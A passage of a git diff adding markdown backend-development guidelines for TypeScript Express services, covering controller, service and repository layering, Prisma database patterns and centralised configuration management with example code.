this.handleSuccess(res, null, 'User deleted', 204);
|
||||||
|
} catch (error) {
|
||||||
|
this.handleError(error, res, 'deleteUser');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Complete Service with DI
|
||||||
|
|
||||||
|
### UserService
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// services/userService.ts
|
||||||
|
import { UserRepository } from '../repositories/UserRepository';
|
||||||
|
import { ConflictError, NotFoundError, ValidationError } from '../types/errors';
|
||||||
|
import type { CreateUserDTO, UpdateUserDTO, User } from '../types/user.types';
|
||||||
|
|
||||||
|
export class UserService {
|
||||||
|
private userRepository: UserRepository;
|
||||||
|
|
||||||
|
constructor(userRepository?: UserRepository) {
|
||||||
|
this.userRepository = userRepository || new UserRepository();
|
||||||
|
}
|
||||||
|
|
||||||
|
async findById(id: string): Promise<User | null> {
|
||||||
|
return await this.userRepository.findById(id);
|
||||||
|
}
|
||||||
|
|
||||||
|
async getAll(): Promise<User[]> {
|
||||||
|
return await this.userRepository.findActive();
|
||||||
|
}
|
||||||
|
|
||||||
|
async create(data: CreateUserDTO): Promise<User> {
|
||||||
|
// Business rule: validate age
|
||||||
|
if (data.age < 18) {
|
||||||
|
throw new ValidationError('User must be 18 or older');
|
||||||
|
}
|
||||||
|
|
||||||
|
// Business rule: check email uniqueness
|
||||||
|
const existing = await this.userRepository.findByEmail(data.email);
|
||||||
|
if (existing) {
|
||||||
|
throw new ConflictError('Email already in use');
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create user with profile
|
||||||
|
return await this.userRepository.create({
|
||||||
|
email: data.email,
|
||||||
|
profile: {
|
||||||
|
create: {
|
||||||
|
firstName: data.firstName,
|
||||||
|
lastName: data.lastName,
|
||||||
|
age: data.age,
|
||||||
|
},
|
||||||
|
},
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
async update(id: string, data: UpdateUserDTO): Promise<User> {
|
||||||
|
// Check exists
|
||||||
|
const existing = await this.userRepository.findById(id);
|
||||||
|
if (!existing) {
|
||||||
|
throw new NotFoundError('User not found');
|
||||||
|
}
|
||||||
|
|
||||||
|
// Business rule: email uniqueness if changing
|
||||||
|
if (data.email && data.email !== existing.email) {
|
||||||
|
const emailTaken = await this.userRepository.findByEmail(data.email);
|
||||||
|
if (emailTaken) {
|
||||||
|
throw new ConflictError('Email already in use');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return await this.userRepository.update(id, data);
|
||||||
|
}
|
||||||
|
|
||||||
|
async delete(id: string): Promise<void> {
|
||||||
|
const existing = await this.userRepository.findById(id);
|
||||||
|
if (!existing) {
|
||||||
|
throw new NotFoundError('User not found');
|
||||||
|
}
|
||||||
|
|
||||||
|
await this.userRepository.delete(id);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Complete Route File
|
||||||
|
|
||||||
|
### userRoutes.ts
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// routes/userRoutes.ts
|
||||||
|
import { Router } from 'express';
|
||||||
|
import { UserController } from '../controllers/UserController';
|
||||||
|
import { SSOMiddlewareClient } from '../middleware/SSOMiddleware';
|
||||||
|
import { auditMiddleware } from '../middleware/auditMiddleware';
|
||||||
|
|
||||||
|
const router = Router();
|
||||||
|
const controller = new UserController();
|
||||||
|
|
||||||
|
// GET /users - List all users
|
||||||
|
router.get('/',
|
||||||
|
SSOMiddlewareClient.verifyLoginStatus,
|
||||||
|
auditMiddleware,
|
||||||
|
async (req, res) => controller.listUsers(req, res)
|
||||||
|
);
|
||||||
|
|
||||||
|
// GET /users/:id - Get single user
|
||||||
|
router.get('/:id',
|
||||||
|
SSOMiddlewareClient.verifyLoginStatus,
|
||||||
|
auditMiddleware,
|
||||||
|
async (req, res) => controller.getUser(req, res)
|
||||||
|
);
|
||||||
|
|
||||||
|
// POST /users - Create user
|
||||||
|
router.post('/',
|
||||||
|
SSOMiddlewareClient.verifyLoginStatus,
|
||||||
|
auditMiddleware,
|
||||||
|
async (req, res) => controller.createUser(req, res)
|
||||||
|
);
|
||||||
|
|
||||||
|
// PUT /users/:id - Update user
|
||||||
|
router.put('/:id',
|
||||||
|
SSOMiddlewareClient.verifyLoginStatus,
|
||||||
|
auditMiddleware,
|
||||||
|
async (req, res) => controller.updateUser(req, res)
|
||||||
|
);
|
||||||
|
|
||||||
|
// DELETE /users/:id - Delete user
|
||||||
|
router.delete('/:id',
|
||||||
|
SSOMiddlewareClient.verifyLoginStatus,
|
||||||
|
auditMiddleware,
|
||||||
|
async (req, res) => controller.deleteUser(req, res)
|
||||||
|
);
|
||||||
|
|
||||||
|
export default router;
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Complete Repository
|
||||||
|
|
||||||
|
### UserRepository
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// repositories/UserRepository.ts
|
||||||
|
import { PrismaService } from '@project-lifecycle-portal/database';
|
||||||
|
import type { User, Prisma } from '@prisma/client';
|
||||||
|
|
||||||
|
export class UserRepository {
|
||||||
|
async findById(id: string): Promise<User | null> {
|
||||||
|
return PrismaService.main.user.findUnique({
|
||||||
|
where: { id },
|
||||||
|
include: { profile: true },
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
async findByEmail(email: string): Promise<User | null> {
|
||||||
|
return PrismaService.main.user.findUnique({
|
||||||
|
where: { email },
|
||||||
|
include: { profile: true },
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
async findActive(): Promise<User[]> {
|
||||||
|
return PrismaService.main.user.findMany({
|
||||||
|
where: { isActive: true },
|
||||||
|
include: { profile: true },
|
||||||
|
orderBy: { createdAt: 'desc' },
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
async create(data: Prisma.UserCreateInput): Promise<User> {
|
||||||
|
return PrismaService.main.user.create({
|
||||||
|
data,
|
||||||
|
include: { profile: true },
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
async update(id: string, data: Prisma.UserUpdateInput): Promise<User> {
|
||||||
|
return PrismaService.main.user.update({
|
||||||
|
where: { id },
|
||||||
|
data,
|
||||||
|
include: { profile: true },
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
async delete(id: string): Promise<User> {
|
||||||
|
// Soft delete
|
||||||
|
return PrismaService.main.user.update({
|
||||||
|
where: { id },
|
||||||
|
data: {
|
||||||
|
isActive: false,
|
||||||
|
deletedAt: new Date(),
|
||||||
|
},
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Refactoring Example: Bad to Good
|
||||||
|
|
||||||
|
### BEFORE: Business Logic in Routes ❌
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// routes/postRoutes.ts (BAD - 200+ lines)
|
||||||
|
router.post('/posts', async (req, res) => {
|
||||||
|
try {
|
||||||
|
const username = res.locals.claims.preferred_username;
|
||||||
|
const responses = req.body.responses;
|
||||||
|
const stepInstanceId = req.body.stepInstanceId;
|
||||||
|
|
||||||
|
// ❌ Permission check in route
|
||||||
|
const userId = await userProfileService.getProfileByEmail(username).then(p => p.id);
|
||||||
|
const canComplete = await permissionService.canCompleteStep(userId, stepInstanceId);
|
||||||
|
if (!canComplete) {
|
||||||
|
return res.status(403).json({ error: 'No permission' });
|
||||||
|
}
|
||||||
|
|
||||||
|
// ❌ Business logic in route
|
||||||
|
const post = await postRepository.create({
|
||||||
|
title: req.body.title,
|
||||||
|
content: req.body.content,
|
||||||
|
authorId: userId
|
||||||
|
});
|
||||||
|
|
||||||
|
// ❌ More business logic...
|
||||||
|
if (res.locals.isImpersonating) {
|
||||||
|
impersonationContextStore.storeContext(...);
|
||||||
|
}
|
||||||
|
|
||||||
|
// ... 100+ more lines
|
||||||
|
|
||||||
|
res.json({ success: true, data: result });
|
||||||
|
} catch (e) {
|
||||||
|
handler.handleException(res, e);
|
||||||
|
}
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
### AFTER: Clean Separation ✅
|
||||||
|
|
||||||
|
**1. Clean Route:**
|
||||||
|
```typescript
|
||||||
|
// routes/postRoutes.ts
|
||||||
|
import { PostController } from '../controllers/PostController';
|
||||||
|
|
||||||
|
const router = Router();
|
||||||
|
const controller = new PostController();
|
||||||
|
|
||||||
|
// ✅ CLEAN: 8 lines total!
|
||||||
|
router.post('/',
|
||||||
|
SSOMiddlewareClient.verifyLoginStatus,
|
||||||
|
auditMiddleware,
|
||||||
|
async (req, res) => controller.createPost(req, res)
|
||||||
|
);
|
||||||
|
|
||||||
|
export default router;
|
||||||
|
```
|
||||||
|
|
||||||
|
**2. Controller:**
|
||||||
|
```typescript
|
||||||
|
// controllers/PostController.ts
|
||||||
|
export class PostController extends BaseController {
|
||||||
|
private postService: PostService;
|
||||||
|
|
||||||
|
constructor() {
|
||||||
|
super();
|
||||||
|
this.postService = new PostService();
|
||||||
|
}
|
||||||
|
|
||||||
|
async createPost(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
const validated = createPostSchema.parse({
|
||||||
|
...req.body,
|
||||||
|
});
|
||||||
|
|
||||||
|
const result = await this.postService.createPost(
|
||||||
|
validated,
|
||||||
|
res.locals.userId
|
||||||
|
);
|
||||||
|
|
||||||
|
this.handleSuccess(res, result, 'Post created successfully');
|
||||||
|
} catch (error) {
|
||||||
|
this.handleError(error, res, 'createPost');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**3. Service:**
|
||||||
|
```typescript
|
||||||
|
// services/postService.ts
|
||||||
|
export class PostService {
|
||||||
|
async createPost(
|
||||||
|
data: CreatePostDTO,
|
||||||
|
userId: string
|
||||||
|
): Promise<SubmissionResult> {
|
||||||
|
// Permission check
|
||||||
|
const canComplete = await permissionService.canCompleteStep(
|
||||||
|
userId,
|
||||||
|
data.stepInstanceId
|
||||||
|
);
|
||||||
|
|
||||||
|
if (!canComplete) {
|
||||||
|
throw new ForbiddenError('No permission to complete step');
|
||||||
|
}
|
||||||
|
|
||||||
|
// Execute workflow
|
||||||
|
const engine = await createWorkflowEngine();
|
||||||
|
const command = new CompleteStepCommand(
|
||||||
|
data.stepInstanceId,
|
||||||
|
userId,
|
||||||
|
data.responses
|
||||||
|
);
|
||||||
|
const events = await engine.executeCommand(command);
|
||||||
|
|
||||||
|
// Handle impersonation
|
||||||
|
if (context.isImpersonating) {
|
||||||
|
await this.handleImpersonation(data.stepInstanceId, context);
|
||||||
|
}
|
||||||
|
|
||||||
|
return { events, success: true };
|
||||||
|
}
|
||||||
|
|
||||||
|
private async handleImpersonation(stepInstanceId: number, context: any) {
|
||||||
|
impersonationContextStore.storeContext(stepInstanceId, {
|
||||||
|
originalUserId: context.originalUserId,
|
||||||
|
effectiveUserId: context.effectiveUserId,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**Result:**
|
||||||
|
- Route: 8 lines (was 200+)
|
||||||
|
- Controller: 25 lines
|
||||||
|
- Service: 40 lines
|
||||||
|
- **Testable, maintainable, reusable!**
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## End-to-End Feature Example
|
||||||
|
|
||||||
|
### Complete User Management Feature
|
||||||
|
|
||||||
|
**1. Types:**
|
||||||
|
```typescript
|
||||||
|
// types/user.types.ts
|
||||||
|
export interface User {
|
||||||
|
id: string;
|
||||||
|
email: string;
|
||||||
|
isActive: boolean;
|
||||||
|
profile?: UserProfile;
|
||||||
|
}
|
||||||
|
|
||||||
|
export interface CreateUserDTO {
|
||||||
|
email: string;
|
||||||
|
firstName: string;
|
||||||
|
lastName: string;
|
||||||
|
age: number;
|
||||||
|
}
|
||||||
|
|
||||||
|
export interface UpdateUserDTO {
|
||||||
|
email?: string;
|
||||||
|
firstName?: string;
|
||||||
|
lastName?: string;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**2. Validators:**
|
||||||
|
```typescript
|
||||||
|
// validators/userSchemas.ts
|
||||||
|
import { z } from 'zod';
|
||||||
|
|
||||||
|
export const createUserSchema = z.object({
|
||||||
|
email: z.string().email(),
|
||||||
|
firstName: z.string().min(1).max(100),
|
||||||
|
lastName: z.string().min(1).max(100),
|
||||||
|
age: z.number().int().min(18).max(120),
|
||||||
|
});
|
||||||
|
|
||||||
|
export const updateUserSchema = z.object({
|
||||||
|
email: z.string().email().optional(),
|
||||||
|
firstName: z.string().min(1).max(100).optional(),
|
||||||
|
lastName: z.string().min(1).max(100).optional(),
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
**3. Repository:**
|
||||||
|
```typescript
|
||||||
|
// repositories/UserRepository.ts
|
||||||
|
export class UserRepository {
|
||||||
|
async findById(id: string): Promise<User | null> {
|
||||||
|
return PrismaService.main.user.findUnique({
|
||||||
|
where: { id },
|
||||||
|
include: { profile: true },
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
async create(data: Prisma.UserCreateInput): Promise<User> {
|
||||||
|
return PrismaService.main.user.create({
|
||||||
|
data,
|
||||||
|
include: { profile: true },
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**4. Service:**
|
||||||
|
```typescript
|
||||||
|
// services/userService.ts
|
||||||
|
export class UserService {
|
||||||
|
private userRepository: UserRepository;
|
||||||
|
|
||||||
|
constructor() {
|
||||||
|
this.userRepository = new UserRepository();
|
||||||
|
}
|
||||||
|
|
||||||
|
async create(data: CreateUserDTO): Promise<User> {
|
||||||
|
const existing = await this.userRepository.findByEmail(data.email);
|
||||||
|
if (existing) {
|
||||||
|
throw new ConflictError('Email already exists');
|
||||||
|
}
|
||||||
|
|
||||||
|
return await this.userRepository.create({
|
||||||
|
email: data.email,
|
||||||
|
profile: {
|
||||||
|
create: {
|
||||||
|
firstName: data.firstName,
|
||||||
|
lastName: data.lastName,
|
||||||
|
age: data.age,
|
||||||
|
},
|
||||||
|
},
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**5. Controller:**
|
||||||
|
```typescript
|
||||||
|
// controllers/UserController.ts
|
||||||
|
export class UserController extends BaseController {
|
||||||
|
private userService: UserService;
|
||||||
|
|
||||||
|
constructor() {
|
||||||
|
super();
|
||||||
|
this.userService = new UserService();
|
||||||
|
}
|
||||||
|
|
||||||
|
async createUser(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
const validated = createUserSchema.parse(req.body);
|
||||||
|
const user = await this.userService.create(validated);
|
||||||
|
this.handleSuccess(res, user, 'User created', 201);
|
||||||
|
} catch (error) {
|
||||||
|
this.handleError(error, res, 'createUser');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**6. Routes:**
|
||||||
|
```typescript
|
||||||
|
// routes/userRoutes.ts
|
||||||
|
const router = Router();
|
||||||
|
const controller = new UserController();
|
||||||
|
|
||||||
|
router.post('/',
|
||||||
|
SSOMiddlewareClient.verifyLoginStatus,
|
||||||
|
async (req, res) => controller.createUser(req, res)
|
||||||
|
);
|
||||||
|
|
||||||
|
export default router;
|
||||||
|
```
|
||||||
|
|
||||||
|
**7. Register in app.ts:**
|
||||||
|
```typescript
|
||||||
|
// app.ts
|
||||||
|
import userRoutes from './routes/userRoutes';
|
||||||
|
|
||||||
|
app.use('/api/users', userRoutes);
|
||||||
|
```
|
||||||
|
|
||||||
|
**Complete Request Flow:**
|
||||||
|
```
|
||||||
|
POST /api/users
|
||||||
|
↓
|
||||||
|
userRoutes matches /
|
||||||
|
↓
|
||||||
|
SSOMiddleware authenticates
|
||||||
|
↓
|
||||||
|
controller.createUser called
|
||||||
|
↓
|
||||||
|
Validates with Zod
|
||||||
|
↓
|
||||||
|
userService.create called
|
||||||
|
↓
|
||||||
|
Checks business rules
|
||||||
|
↓
|
||||||
|
userRepository.create called
|
||||||
|
↓
|
||||||
|
Prisma creates user
|
||||||
|
↓
|
||||||
|
Returns up the chain
|
||||||
|
↓
|
||||||
|
Controller formats response
|
||||||
|
↓
|
||||||
|
200/201 sent to client
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
**Related Files:**
|
||||||
|
- [SKILL.md](SKILL.md)
|
||||||
|
- [routing-and-controllers.md](routing-and-controllers.md)
|
||||||
|
- [services-and-repositories.md](services-and-repositories.md)
|
||||||
|
- [validation-patterns.md](validation-patterns.md)
|
||||||
275
skills/backend-dev-guidelines/resources/configuration.md
Normal file
275
skills/backend-dev-guidelines/resources/configuration.md
Normal file
@@ -0,0 +1,275 @@
|
|||||||
|
# Configuration Management - UnifiedConfig Pattern
|
||||||
|
|
||||||
|
Complete guide to managing configuration in backend microservices.
|
||||||
|
|
||||||
|
## Table of Contents
|
||||||
|
|
||||||
|
- [UnifiedConfig Overview](#unifiedconfig-overview)
|
||||||
|
- [NEVER Use process.env Directly](#never-use-processenv-directly)
|
||||||
|
- [Configuration Structure](#configuration-structure)
|
||||||
|
- [Environment-Specific Configs](#environment-specific-configs)
|
||||||
|
- [Secrets Management](#secrets-management)
|
||||||
|
- [Migration Guide](#migration-guide)
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## UnifiedConfig Overview
|
||||||
|
|
||||||
|
### Why UnifiedConfig?
|
||||||
|
|
||||||
|
**Problems with process.env:**
|
||||||
|
- ❌ No type safety
|
||||||
|
- ❌ No validation
|
||||||
|
- ❌ Hard to test
|
||||||
|
- ❌ Scattered throughout code
|
||||||
|
- ❌ No default values
|
||||||
|
- ❌ Runtime errors for typos
|
||||||
|
|
||||||
|
**Benefits of unifiedConfig:**
|
||||||
|
- ✅ Type-safe configuration
|
||||||
|
- ✅ Single source of truth
|
||||||
|
- ✅ Validated at startup
|
||||||
|
- ✅ Easy to test with mocks
|
||||||
|
- ✅ Clear structure
|
||||||
|
- ✅ Fallback to environment variables
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## NEVER Use process.env Directly
|
||||||
|
|
||||||
|
### The Rule
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ❌ NEVER DO THIS
|
||||||
|
const timeout = parseInt(process.env.TIMEOUT_MS || '5000');
|
||||||
|
const dbHost = process.env.DB_HOST || 'localhost';
|
||||||
|
|
||||||
|
// ✅ ALWAYS DO THIS
|
||||||
|
import { config } from './config/unifiedConfig';
|
||||||
|
const timeout = config.timeouts.default;
|
||||||
|
const dbHost = config.database.host;
|
||||||
|
```
|
||||||
|
|
||||||
|
### Why This Matters
|
||||||
|
|
||||||
|
**Example of problems:**
|
||||||
|
```typescript
|
||||||
|
// Typo in environment variable name
|
||||||
|
const host = process.env.DB_HSOT; // undefined! No error!
|
||||||
|
|
||||||
|
// Type safety
|
||||||
|
const port = process.env.PORT; // string! Need parseInt
|
||||||
|
const timeout = parseInt(process.env.TIMEOUT); // NaN if not set!
|
||||||
|
```
|
||||||
|
|
||||||
|
**With unifiedConfig:**
|
||||||
|
```typescript
|
||||||
|
const port = config.server.port; // number, guaranteed
|
||||||
|
const timeout = config.timeouts.default; // number, with fallback
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Configuration Structure
|
||||||
|
|
||||||
|
### UnifiedConfig Interface
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
export interface UnifiedConfig {
|
||||||
|
database: {
|
||||||
|
host: string;
|
||||||
|
port: number;
|
||||||
|
username: string;
|
||||||
|
password: string;
|
||||||
|
database: string;
|
||||||
|
};
|
||||||
|
server: {
|
||||||
|
port: number;
|
||||||
|
sessionSecret: string;
|
||||||
|
};
|
||||||
|
tokens: {
|
||||||
|
jwt: string;
|
||||||
|
inactivity: string;
|
||||||
|
internal: string;
|
||||||
|
};
|
||||||
|
keycloak: {
|
||||||
|
realm: string;
|
||||||
|
client: string;
|
||||||
|
baseUrl: string;
|
||||||
|
secret: string;
|
||||||
|
};
|
||||||
|
aws: {
|
||||||
|
region: string;
|
||||||
|
emailQueueUrl: string;
|
||||||
|
accessKeyId: string;
|
||||||
|
secretAccessKey: string;
|
||||||
|
};
|
||||||
|
sentry: {
|
||||||
|
dsn: string;
|
||||||
|
environment: string;
|
||||||
|
tracesSampleRate: number;
|
||||||
|
};
|
||||||
|
// ... more sections
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Implementation Pattern
|
||||||
|
|
||||||
|
**File:** `/blog-api/src/config/unifiedConfig.ts`
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
import * as fs from 'fs';
|
||||||
|
import * as path from 'path';
|
||||||
|
import * as ini from 'ini';
|
||||||
|
|
||||||
|
const configPath = path.join(__dirname, '../../config.ini');
|
||||||
|
const iniConfig = ini.parse(fs.readFileSync(configPath, 'utf-8'));
|
||||||
|
|
||||||
|
export const config: UnifiedConfig = {
|
||||||
|
database: {
|
||||||
|
host: iniConfig.database?.host || process.env.DB_HOST || 'localhost',
|
||||||
|
port: parseInt(iniConfig.database?.port || process.env.DB_PORT || '3306'),
|
||||||
|
username: iniConfig.database?.username || process.env.DB_USER || 'root',
|
||||||
|
password: iniConfig.database?.password || process.env.DB_PASSWORD || '',
|
||||||
|
database: iniConfig.database?.database || process.env.DB_NAME || 'blog_dev',
|
||||||
|
},
|
||||||
|
server: {
|
||||||
|
port: parseInt(iniConfig.server?.port || process.env.PORT || '3002'),
|
||||||
|
sessionSecret: iniConfig.server?.sessionSecret || process.env.SESSION_SECRET || 'dev-secret',
|
||||||
|
},
|
||||||
|
// ... more configuration
|
||||||
|
};
|
||||||
|
|
||||||
|
// Validate critical config
|
||||||
|
if (!config.tokens.jwt) {
|
||||||
|
throw new Error('JWT secret not configured!');
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**Key Points:**
|
||||||
|
- Read from config.ini first
|
||||||
|
- Fallback to process.env
|
||||||
|
- Default values for development
|
||||||
|
- Validation at startup
|
||||||
|
- Type-safe access
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Environment-Specific Configs
|
||||||
|
|
||||||
|
### config.ini Structure
|
||||||
|
|
||||||
|
```ini
|
||||||
|
[database]
|
||||||
|
host = localhost
|
||||||
|
port = 3306
|
||||||
|
username = root
|
||||||
|
password = password1
|
||||||
|
database = blog_dev
|
||||||
|
|
||||||
|
[server]
|
||||||
|
port = 3002
|
||||||
|
sessionSecret = your-secret-here
|
||||||
|
|
||||||
|
[tokens]
|
||||||
|
jwt = your-jwt-secret
|
||||||
|
inactivity = 30m
|
||||||
|
internal = internal-api-token
|
||||||
|
|
||||||
|
[keycloak]
|
||||||
|
realm = myapp
|
||||||
|
client = myapp-client
|
||||||
|
baseUrl = http://localhost:8080
|
||||||
|
secret = keycloak-client-secret
|
||||||
|
|
||||||
|
[sentry]
|
||||||
|
dsn = https://your-sentry-dsn
|
||||||
|
environment = development
|
||||||
|
tracesSampleRate = 0.1
|
||||||
|
```
|
||||||
|
|
||||||
|
### Environment Overrides
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# .env file (optional overrides)
|
||||||
|
DB_HOST=production-db.example.com
|
||||||
|
DB_PASSWORD=secure-password
|
||||||
|
PORT=80
|
||||||
|
```
|
||||||
|
|
||||||
|
**Precedence:**
|
||||||
|
1. config.ini (highest priority)
|
||||||
|
2. process.env variables
|
||||||
|
3. Hard-coded defaults (lowest priority)
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Secrets Management
|
||||||
|
|
||||||
|
### DO NOT Commit Secrets
|
||||||
|
|
||||||
|
```gitignore
|
||||||
|
# .gitignore
|
||||||
|
config.ini
|
||||||
|
.env
|
||||||
|
sentry.ini
|
||||||
|
*.pem
|
||||||
|
*.key
|
||||||
|
```
|
||||||
|
|
||||||
|
### Use Environment Variables in Production
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Development: config.ini
|
||||||
|
// Production: Environment variables
|
||||||
|
|
||||||
|
export const config: UnifiedConfig = {
|
||||||
|
database: {
|
||||||
|
password: process.env.DB_PASSWORD || iniConfig.database?.password || '',
|
||||||
|
},
|
||||||
|
tokens: {
|
||||||
|
jwt: process.env.JWT_SECRET || iniConfig.tokens?.jwt || '',
|
||||||
|
},
|
||||||
|
};
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Migration Guide
|
||||||
|
|
||||||
|
### Find All process.env Usage
|
||||||
|
|
||||||
|
```bash
|
||||||
|
grep -r "process.env" blog-api/src/ --include="*.ts" | wc -l
|
||||||
|
```
|
||||||
|
|
||||||
|
### Migration Example
|
||||||
|
|
||||||
|
**Before:**
|
||||||
|
```typescript
|
||||||
|
// Scattered throughout code
|
||||||
|
const timeout = parseInt(process.env.OPENID_HTTP_TIMEOUT_MS || '15000');
|
||||||
|
const keycloakUrl = process.env.KEYCLOAK_BASE_URL;
|
||||||
|
const jwtSecret = process.env.JWT_SECRET;
|
||||||
|
```
|
||||||
|
|
||||||
|
**After:**
|
||||||
|
```typescript
|
||||||
|
import { config } from './config/unifiedConfig';
|
||||||
|
|
||||||
|
const timeout = config.keycloak.timeout;
|
||||||
|
const keycloakUrl = config.keycloak.baseUrl;
|
||||||
|
const jwtSecret = config.tokens.jwt;
|
||||||
|
```
|
||||||
|
|
||||||
|
**Benefits:**
|
||||||
|
- Type-safe
|
||||||
|
- Centralized
|
||||||
|
- Easy to test
|
||||||
|
- Validated at startup
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
**Related Files:**
|
||||||
|
- [SKILL.md](SKILL.md)
|
||||||
|
- [testing-guide.md](testing-guide.md)
|
||||||
224
skills/backend-dev-guidelines/resources/database-patterns.md
Normal file
224
skills/backend-dev-guidelines/resources/database-patterns.md
Normal file
@@ -0,0 +1,224 @@
|
|||||||
|
# Database Patterns - Prisma Best Practices
|
||||||
|
|
||||||
|
Complete guide to database access patterns using Prisma in backend microservices.
|
||||||
|
|
||||||
|
## Table of Contents
|
||||||
|
|
||||||
|
- [PrismaService Usage](#prismaservice-usage)
|
||||||
|
- [Repository Pattern](#repository-pattern)
|
||||||
|
- [Transaction Patterns](#transaction-patterns)
|
||||||
|
- [Query Optimization](#query-optimization)
|
||||||
|
- [N+1 Query Prevention](#n1-query-prevention)
|
||||||
|
- [Error Handling](#error-handling)
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## PrismaService Usage
|
||||||
|
|
||||||
|
### Basic Pattern
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
import { PrismaService } from '@project-lifecycle-portal/database';
|
||||||
|
|
||||||
|
// Always use PrismaService.main
|
||||||
|
const users = await PrismaService.main.user.findMany();
|
||||||
|
```
|
||||||
|
|
||||||
|
### Check Availability
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
if (!PrismaService.isAvailable) {
|
||||||
|
throw new Error('Prisma client not initialized');
|
||||||
|
}
|
||||||
|
|
||||||
|
const user = await PrismaService.main.user.findUnique({ where: { id } });
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Repository Pattern
|
||||||
|
|
||||||
|
### Why Use Repositories
|
||||||
|
|
||||||
|
✅ **Use repositories when:**
|
||||||
|
- Complex queries with joins/includes
|
||||||
|
- Query used in multiple places
|
||||||
|
- Need caching layer
|
||||||
|
- Want to mock for testing
|
||||||
|
|
||||||
|
❌ **Skip repositories for:**
|
||||||
|
- Simple one-off queries
|
||||||
|
- Prototyping (can refactor later)
|
||||||
|
|
||||||
|
### Repository Template
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
export class UserRepository {
|
||||||
|
async findById(id: string): Promise<User | null> {
|
||||||
|
return PrismaService.main.user.findUnique({
|
||||||
|
where: { id },
|
||||||
|
include: { profile: true },
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
async findActive(): Promise<User[]> {
|
||||||
|
return PrismaService.main.user.findMany({
|
||||||
|
where: { isActive: true },
|
||||||
|
orderBy: { createdAt: 'desc' },
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
async create(data: Prisma.UserCreateInput): Promise<User> {
|
||||||
|
return PrismaService.main.user.create({ data });
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Transaction Patterns
|
||||||
|
|
||||||
|
### Simple Transaction
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
const result = await PrismaService.main.$transaction(async (tx) => {
|
||||||
|
const user = await tx.user.create({ data: userData });
|
||||||
|
const profile = await tx.userProfile.create({ data: { userId: user.id } });
|
||||||
|
return { user, profile };
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
### Interactive Transaction
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
const result = await PrismaService.main.$transaction(
|
||||||
|
async (tx) => {
|
||||||
|
const user = await tx.user.findUnique({ where: { id } });
|
||||||
|
if (!user) throw new Error('User not found');
|
||||||
|
|
||||||
|
return await tx.user.update({
|
||||||
|
where: { id },
|
||||||
|
data: { lastLogin: new Date() },
|
||||||
|
});
|
||||||
|
},
|
||||||
|
{
|
||||||
|
maxWait: 5000,
|
||||||
|
timeout: 10000,
|
||||||
|
}
|
||||||
|
);
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Query Optimization
|
||||||
|
|
||||||
|
### Use select to Limit Fields
|
||||||
|
|
||||||
|
```typescript
